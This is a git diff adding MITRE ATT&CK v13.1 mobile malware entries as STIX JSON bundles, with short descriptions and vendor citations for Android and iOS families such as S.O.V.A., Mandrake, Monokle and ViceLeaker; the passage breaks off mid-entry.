b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--4b53eb01-57d7-47b4-b078-22766b002b36.json @@ -0,0 +1,53 @@ +{ + "type": "bundle", + "id": "bundle--89dd569f-7b05-447e-8151-2e7911a11aa8", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-04-13T22:32:16.509Z", + "name": "S.O.V.A.", + "description": "[S.O.V.A.](https://attack.mitre.org/software/S1062) is an Android banking trojan that was first identified in August 2021 and has subsequently been found in a variety of applications, including banking, cryptocurrency wallet/exchange, and shopping apps. [S.O.V.A.](https://attack.mitre.org/software/S1062), which is Russian for \"owl\", contains features not commonly found in Android malware, such as session cookie theft.(Citation: threatfabric_sova_0921)(Citation: cleafy_sova_1122)", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_aliases": [ + "S.O.V.A." + ], + "type": "malware", + "id": "malware--4b53eb01-57d7-47b4-b078-22766b002b36", + "created": "2023-02-06T19:34:43.026Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S1062", + "external_id": "S1062" + }, + { + "source_name": "cleafy_sova_1122", + "description": "Francesco Lubatti, Federico Valentini. (2022, November 8). SOVA malware is back and is evolving rapidly. Retrieved March 30, 2023.", + "url": "https://www.cleafy.com/cleafy-labs/sova-malware-is-back-and-is-evolving-rapidly" + }, + { + "source_name": "threatfabric_sova_0921", + "description": "ThreatFabric. (2021, September 9). S.O.V.A. - A new Android Banking trojan with fowl intentions. Retrieved February 6, 2023.", + "url": "https://www.threatfabric.com/blogs/sova-new-trojan-with-fowl-intentions.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--4bf6ba32-4165-42c1-b911-9c36165891c8.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--4bf6ba32-4165-42c1-b911-9c36165891c8.json new file mode 100644 index 0000000000000000000000000000000000000000..fd2402a09752f78145c55e7593937b8fa90ecd2c --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--4bf6ba32-4165-42c1-b911-9c36165891c8.json @@ -0,0 +1,50 @@ +{ + "type": "bundle", + "id": "bundle--26b81283-4788-4d01-8b1d-fa9519d5f54c", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "ANDROIDOS_ANSERVER.A", + "description": "[ANDROIDOS_ANSERVER.A](https://attack.mitre.org/software/S0310) is Android malware that is unique because it uses encrypted content within a blog site for command and control. (Citation: TrendMicro-Anserver)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.3", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_aliases": [ + "ANDROIDOS_ANSERVER.A" + ], + "type": "malware", + "id": "malware--4bf6ba32-4165-42c1-b911-9c36165891c8", + "created": "2017-10-25T14:48:47.965Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0310", + "external_id": "S0310" + }, + { + "source_name": "ANDROIDOS_ANSERVER.A", + "description": "(Citation: TrendMicro-Anserver)" + }, + { + "source_name": "TrendMicro-Anserver", + "description": "Karl Dominguez. (2011, October 2). Android Malware Uses Blog Posts as C&C. Retrieved February 6, 2017.", + "url": "http://blog.trendmicro.com/trendlabs-security-intelligence/android-malware-uses-blog-posts-as-cc/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--507fe748-5e4a-4b45-9e9f-8b1115f4e878.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--507fe748-5e4a-4b45-9e9f-8b1115f4e878.json new file mode 100644 index 0000000000000000000000000000000000000000..010c3d9f441ab48e96327d959ff10e1b0847e0bf --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--507fe748-5e4a-4b45-9e9f-8b1115f4e878.json @@ -0,0 +1,44 @@ +{ + "type": "bundle", + "id": "bundle--6c2b09c0-0980-4685-9bcf-04861664380b", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "DualToy", + "description": "[DualToy](https://attack.mitre.org/software/S0315) is Windows malware that installs malicious applications onto Android and iOS devices connected over USB. (Citation: PaloAlto-DualToy)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "malware", + "id": "malware--507fe748-5e4a-4b45-9e9f-8b1115f4e878", + "created": "2017-10-25T14:48:41.721Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0315", + "external_id": "S0315" + }, + { + "source_name": "DualToy", + "description": "(Citation: PaloAlto-DualToy)" + }, + { + "source_name": "PaloAlto-DualToy", + "description": "Claud Xiao. (2016, September 13). DualToy: New Windows Trojan Sideloads Risky Apps to Android and iOS Devices. Retrieved January 24, 2017.", + "url": "https://researchcenter.paloaltonetworks.com/2016/09/dualtoy-new-windows-trojan-sideloads-risky-apps-to-android-and-ios-devices/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--52c994fa-b6c8-45a8-9586-a4275cf19307.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--52c994fa-b6c8-45a8-9586-a4275cf19307.json new file mode 100644 index 0000000000000000000000000000000000000000..71fe12f16e7e764dc992060f30149169d11a41cd --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--52c994fa-b6c8-45a8-9586-a4275cf19307.json @@ -0,0 +1,66 @@ +{ + "type": "bundle", + "id": "bundle--fdf693fa-daeb-4d2a-9057-2a4cdc0bdaef", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "Mandrake", + "oxide", + "briar", + "ricinus", + "darkmatter" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--52c994fa-b6c8-45a8-9586-a4275cf19307", + "type": "malware", + "created": "2020-07-15T20:20:58.846Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0485", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0485" + }, + { + "source_name": "oxide", + "description": "(Citation: Bitdefender Mandrake)" + }, + { + "source_name": "briar", + "description": "(Citation: Bitdefender Mandrake)" + }, + { + "source_name": "ricinus", + "description": "(Citation: Bitdefender Mandrake)" + }, + { + "source_name": "darkmatter", + "description": "(Citation: Bitdefender Mandrake)" + }, + { + "source_name": "Bitdefender Mandrake", + "url": "https://www.bitdefender.com/files/News/CaseStudies/study/329/Bitdefender-PR-Whitepaper-Mandrake-creat4464-en-EN-interactive.pdf", + "description": "R. Gevers, M. Tivadar, R. Bleotu, A. M. Barbatei, et al.. (2020, May 14). Uprooting Mandrake: The Story of an Advanced Android Spyware Framework That Went Undetected for 4 Years. Retrieved July 15, 2020." + } + ], + "modified": "2020-09-11T15:52:12.097Z", + "name": "Mandrake", + "description": "[Mandrake](https://attack.mitre.org/software/S0485) is a sophisticated Android espionage platform that has been active in the wild since at least 2016. [Mandrake](https://attack.mitre.org/software/S0485) is very actively maintained, with sophisticated features and attacks that are executed with surgical precision.\n\n[Mandrake](https://attack.mitre.org/software/S0485) has gone undetected for several years by providing legitimate, ad-free applications with social media and real reviews to back the apps. The malware is only activated when the operators issue a specific command.(Citation: Bitdefender Mandrake)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--56660521-6db4-4e5a-a927-464f22954b7c.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--56660521-6db4-4e5a-a927-464f22954b7c.json new file mode 100644 index 0000000000000000000000000000000000000000..0966e462bdfc2268d94563e52e1d3f912cf2991f --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--56660521-6db4-4e5a-a927-464f22954b7c.json @@ -0,0 +1,44 @@ +{ + "type": "bundle", + "id": "bundle--7cd8c0ca-393f-42f6-a0b2-ad4473ca33d4", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "X-Agent for Android", + "description": "[X-Agent for Android](https://attack.mitre.org/software/S0314) is Android malware that was placed in a repackaged version of a Ukrainian artillery targeting application. The malware reportedly retrieved general location data on where the victim device was used, and therefore could likely indicate the potential location of Ukrainian artillery. (Citation: CrowdStrike-Android) Is it tracked separately from the [CHOPSTICK](https://attack.mitre.org/software/S0023).", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "malware", + "id": "malware--56660521-6db4-4e5a-a927-464f22954b7c", + "created": "2017-10-25T14:48:42.034Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0314", + "external_id": "S0314" + }, + { + "source_name": "X-Agent for Android", + "description": "(Citation: CrowdStrike-Android)" + }, + { + "source_name": "CrowdStrike-Android", + "description": "CrowdStrike Global Intelligence Team. (2016). Use of Fancy Bear Android Malware in Tracking of Ukrainian FIeld Artillery Units. Retrieved February 6, 2017.", + "url": "https://www.crowdstrike.com/wp-content/brochures/FancyBearTracksUkrainianArtillery.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--5a5dca4c-03c1-4b99-bfcf-c206e20aa663.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--5a5dca4c-03c1-4b99-bfcf-c206e20aa663.json new file mode 100644 index 0000000000000000000000000000000000000000..cda08490cf9af1c43b6f5fb3af6d584f16815738 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--5a5dca4c-03c1-4b99-bfcf-c206e20aa663.json @@ -0,0 +1,49 @@ +{ + "type": "bundle", + "id": "bundle--b73f51da-4a16-499c-b52e-65ea4a898f0e", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_contributors": [ + "Luk\u00e1\u0161 \u0160tefanko, ESET" + ], + "x_mitre_aliases": [ + "DEFENSOR ID" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--5a5dca4c-03c1-4b99-bfcf-c206e20aa663", + "type": "malware", + "created": "2020-06-26T15:12:39.648Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0479", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0479" + }, + { + "source_name": "ESET DEFENSOR ID", + "url": "https://www.welivesecurity.com/2020/05/22/insidious-android-malware-gives-up-all-malicious-features-but-one-gain-stealth/", + "description": "L. Stefanko. (2020, May 22). Insidious Android malware gives up all malicious features but one to gain stealth. Retrieved June 26, 2020." + } + ], + "modified": "2020-06-26T20:16:31.850Z", + "name": "DEFENSOR ID", + "description": "[DEFENSOR ID](https://attack.mitre.org/software/S0479) is a banking trojan capable of clearing a victim\u2019s bank account or cryptocurrency wallet and taking over email or social media accounts. [DEFENSOR ID](https://attack.mitre.org/software/S0479) performs the majority of its malicious functionality by abusing Android\u2019s accessibility service.(Citation: ESET DEFENSOR ID) ", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--5ddf81ea-2c06-497b-8c30-5f1ab89a40f9.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--5ddf81ea-2c06-497b-8c30-5f1ab89a40f9.json new file mode 100644 index 0000000000000000000000000000000000000000..d77c891b7f982d80bc1fffeb5ac164ecf450c3f4 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--5ddf81ea-2c06-497b-8c30-5f1ab89a40f9.json @@ -0,0 +1,44 @@ +{ + "type": "bundle", + "id": "bundle--73842ea7-e8d6-44d2-89b5-e17c3cc29207", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "MazarBOT", + "description": "[MazarBOT](https://attack.mitre.org/software/S0303) is Android malware that was distributed via SMS in Denmark in 2016. (Citation: Tripwire-MazarBOT)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "malware", + "id": "malware--5ddf81ea-2c06-497b-8c30-5f1ab89a40f9", + "created": "2017-10-25T14:48:40.875Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0303", + "external_id": "S0303" + }, + { + "source_name": "MazarBOT", + "description": "(Citation: Tripwire-MazarBOT)" + }, + { + "source_name": "Tripwire-MazarBOT", + "description": "Graham Cluley. (2016, February 16). Android users warned of malware attack spreading via SMS. Retrieved December 23, 2016.", + "url": "https://www.tripwire.com/state-of-security/security-data-protection/android-malware-sms/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--6146be90-470c-4049-bb3a-9986b8ffb65b.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--6146be90-470c-4049-bb3a-9986b8ffb65b.json new file mode 100644 index 0000000000000000000000000000000000000000..6b332477e4ce249d871b266e064f1df4ee2d9702 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--6146be90-470c-4049-bb3a-9986b8ffb65b.json @@ -0,0 +1,50 @@ +{ + "type": "bundle", + "id": "bundle--23cff331-cc5e-44e4-9f0e-ff75ba38e76b", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_contributors": [ + "Aviran Hazum, Check Point", + "Sergey Persikov, Check Point" + ], + "x_mitre_aliases": [ + "Ginp" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--6146be90-470c-4049-bb3a-9986b8ffb65b", + "type": "malware", + "created": "2020-04-08T15:51:24.862Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0423", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0423" + }, + { + "description": "ThreatFabric. (2019, November). Ginp - A malware patchwork borrowing from Anubis. Retrieved April 8, 2020.", + "url": "https://www.threatfabric.com/blogs/ginp_a_malware_patchwork_borrowing_from_anubis.html", + "source_name": "ThreatFabric Ginp" + } + ], + "modified": "2020-09-11T15:50:18.707Z", + "name": "Ginp", + "description": "[Ginp](https://attack.mitre.org/software/S0423) is an Android banking trojan that has been used to target Spanish banks. Some of the code was taken directly from [Anubis](https://attack.mitre.org/software/S0422).(Citation: ThreatFabric Ginp)", + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--6447e3a1-ef4d-44b1-99d5-6b1c4888674f.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--6447e3a1-ef4d-44b1-99d5-6b1c4888674f.json new file mode 100644 index 0000000000000000000000000000000000000000..075c343a7402fdb52caf0bba3ad4387de58aaa02 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--6447e3a1-ef4d-44b1-99d5-6b1c4888674f.json @@ -0,0 +1,44 @@ +{ + "type": "bundle", + "id": "bundle--e3c28bcd-fa0b-476f-9545-fe23adcc864b", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "HummingWhale", + "description": "[HummingWhale](https://attack.mitre.org/software/S0321) is an Android malware family that performs ad fraud. (Citation: ArsTechnica-HummingWhale)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "malware", + "id": "malware--6447e3a1-ef4d-44b1-99d5-6b1c4888674f", + "created": "2017-10-25T14:48:40.259Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0321", + "external_id": "S0321" + }, + { + "source_name": "HummingWhale", + "description": "(Citation: ArsTechnica-HummingWhale)" + }, + { + "source_name": "ArsTechnica-HummingWhale", + "description": "Dan Goodin. (2017, January 23). Virulent Android malware returns, gets >2 million downloads on Google Play. Retrieved January 24, 2017.", + "url": "http://arstechnica.com/security/2017/01/virulent-android-malware-returns-gets-2-million-downloads-on-google-play/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--680f680c-eef9-4f8a-b5f5-f451bf47e403.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--680f680c-eef9-4f8a-b5f5-f451bf47e403.json new file mode 100644 index 0000000000000000000000000000000000000000..49a60b890cd8ebf15cd31c4dbf676dc48b7dd5c3 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--680f680c-eef9-4f8a-b5f5-f451bf47e403.json @@ -0,0 +1,47 @@ +{ + "type": "bundle", + "id": "bundle--aa99b109-0573-42b5-b889-cadca5361d9c", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "eSurv" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--680f680c-eef9-4f8a-b5f5-f451bf47e403", + "type": "malware", + "created": "2020-09-14T14:13:45.032Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0507", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0507" + }, + { + "source_name": "Lookout eSurv", + "url": "https://blog.lookout.com/esurv-research", + "description": "A. Bauer. (2019, April 8). Lookout discovers phishing sites distributing new iOS and Android surveillanceware. Retrieved September 11, 2020." + } + ], + "modified": "2020-09-14T15:39:17.698Z", + "name": "eSurv", + "description": "[eSurv](https://attack.mitre.org/software/S0507) is mobile surveillanceware designed for the lawful intercept market that was developed over the course of many years.(Citation: Lookout eSurv)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--68156e5a-4c3a-46dd-9c5e-c0bfdec6651f.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--68156e5a-4c3a-46dd-9c5e-c0bfdec6651f.json new file mode 100644 index 0000000000000000000000000000000000000000..d92cc9151fb2e11898eb5684aaa8efa9072c092e --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--68156e5a-4c3a-46dd-9c5e-c0bfdec6651f.json @@ -0,0 +1,48 @@ +{ + "type": "bundle", + "id": "bundle--6ff57f39-c5c1-46bb-9d7f-038093c85c8c", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-01T22:00:09.640Z", + "name": "TangleBot", + "description": "[TangleBot](https://attack.mitre.org/software/S1069) is SMS malware that was initially observed in September 2021, primarily targeting mobile users in the United States and Canada. [TangleBot](https://attack.mitre.org/software/S1069) has used SMS text message lures about COVID-19 regulations and vaccines to trick mobile users into downloading the malware, similar to [FluBot](https://attack.mitre.org/software/S1067) Android malware campaigns.(Citation: cloudmark_tanglebot_0921)", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_aliases": [ + "TangleBot" + ], + "type": "malware", + "id": "malware--68156e5a-4c3a-46dd-9c5e-c0bfdec6651f", + "created": "2023-02-28T21:39:52.744Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S1069", + "external_id": "S1069" + }, + { + "source_name": "cloudmark_tanglebot_0921", + "description": "Felipe Naves, Andrew Conway, W. Stuart Jones, Adam McNeil . (2021, September 23). TangleBot: New Advanced SMS Malware Targets Mobile Users Across U.S. and Canada with COVID-19 Lures. Retrieved February 28, 2023.", + "url": "https://www.cloudmark.com/en/blog/malware/tanglebot-new-advanced-sms-malware-targets-mobile-users-across-us-and-canada-covid-19" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--6a7aaab1-3e0a-48bb-ba66-bbf7665c0a65.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--6a7aaab1-3e0a-48bb-ba66-bbf7665c0a65.json new file mode 100644 index 0000000000000000000000000000000000000000..241dcd4a8bc8fb9dec8549951a8a20ce5cbb0312 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--6a7aaab1-3e0a-48bb-ba66-bbf7665c0a65.json @@ -0,0 +1,49 @@ +{ + "type": "bundle", + "id": "bundle--b3b8980d-38d6-435f-93bb-998abf1e08c9", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_contributors": [ + "J\u00f6rg Abraham, EclecticIQ" + ], + "x_mitre_aliases": [ + "Monokle" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--6a7aaab1-3e0a-48bb-ba66-bbf7665c0a65", + "type": "malware", + "created": "2019-09-04T14:28:14.181Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "url": "https://attack.mitre.org/software/S0407", + "source_name": "mitre-attack", + "external_id": "S0407" + }, + { + "description": "Bauer A., Kumar A., Hebeisen C., et al. (2019, July). Monokle: The Mobile Surveillance Tooling of the Special Technology Center. Retrieved September 4, 2019.", + "url": "https://www.lookout.com/documents/threat-reports/lookout-discovers-monokle-threat-report.pdf", + "source_name": "Lookout-Monokle" + } + ], + "modified": "2021-11-01T18:30:41.998Z", + "name": "Monokle", + "description": "[Monokle](https://attack.mitre.org/software/S0407) is targeted, sophisticated mobile surveillanceware. It is developed for Android, but there are some code artifacts that suggests an iOS version may be in development.(Citation: Lookout-Monokle)", + "x_mitre_version": "1.2", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--6e282bbf-5f32-476a-b879-ba77eec463c8.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--6e282bbf-5f32-476a-b879-ba77eec463c8.json new file mode 100644 index 0000000000000000000000000000000000000000..7996a7d076b47a3da2475b415f3f5744abb54a2f --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--6e282bbf-5f32-476a-b879-ba77eec463c8.json @@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--40105c51-b144-420d-90e9-c27b4be270d6", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "Red Alert 2.0" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--6e282bbf-5f32-476a-b879-ba77eec463c8", + "type": "malware", + "created": "2020-12-14T14:52:02.949Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0539", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0539" + }, + { + "source_name": "Sophos Red Alert 2.0", + "url": "https://news.sophos.com/en-us/2018/07/23/red-alert-2-0-android-trojan-targets-security-seekers/", + "description": "J. Chandraiah. (2018, July 23). Red Alert 2.0: Android Trojan targets security-seekers. Retrieved December 14, 2020." + } + ], + "modified": "2020-12-16T20:52:20.822Z", + "name": "Red Alert 2.0", + "description": "[Red Alert 2.0](https://attack.mitre.org/software/S0539) is a banking trojan that masquerades as a VPN client.(Citation: Sophos Red Alert 2.0) ", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--6fcaf9b0-b509-4644-9f93-556222c81ed2.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--6fcaf9b0-b509-4644-9f93-556222c81ed2.json new file mode 100644 index 0000000000000000000000000000000000000000..2063b352ef878be02824abb3a6be40e83b1dd3f6 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--6fcaf9b0-b509-4644-9f93-556222c81ed2.json @@ -0,0 +1,60 @@ +{ + "type": "bundle", + "id": "bundle--0d80d4cd-5790-4777-9ad8-ccd7acd9e024", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "ViceLeaker", + "Triout" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--6fcaf9b0-b509-4644-9f93-556222c81ed2", + "type": "malware", + "created": "2019-11-21T16:42:48.203Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0418", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0418" + }, + { + "source_name": "ViceLeaker", + "description": "(Citation: SecureList - ViceLeaker 2019)" + }, + { + "source_name": "Triout", + "description": "(Citation: SecureList - ViceLeaker 2019)" + }, + { + "description": "GReAT. (2019, June 26). ViceLeaker Operation: mobile espionage targeting Middle East. Retrieved November 21, 2019.", + "url": "https://securelist.com/fanning-the-flames-viceleaker-operation/90877/", + "source_name": "SecureList - ViceLeaker 2019" + }, + { + "source_name": "Bitdefender - Triout 2018", + "url": "https://labs.bitdefender.com/2018/08/triout-spyware-framework-for-android-with-extensive-surveillance-capabilities/", + "description": "L. Arsene, C. Ochinca. (2018, August 20). Triout \u2013 Spyware Framework for Android with Extensive Surveillance Capabilities. Retrieved January 21, 2020." + } + ], + "modified": "2020-03-26T19:00:42.233Z", + "name": "ViceLeaker", + "description": "[ViceLeaker](https://attack.mitre.org/software/S0418) is a spyware framework, capable of extensive surveillance and data exfiltration operations, primarily targeting devices belonging to Israeli 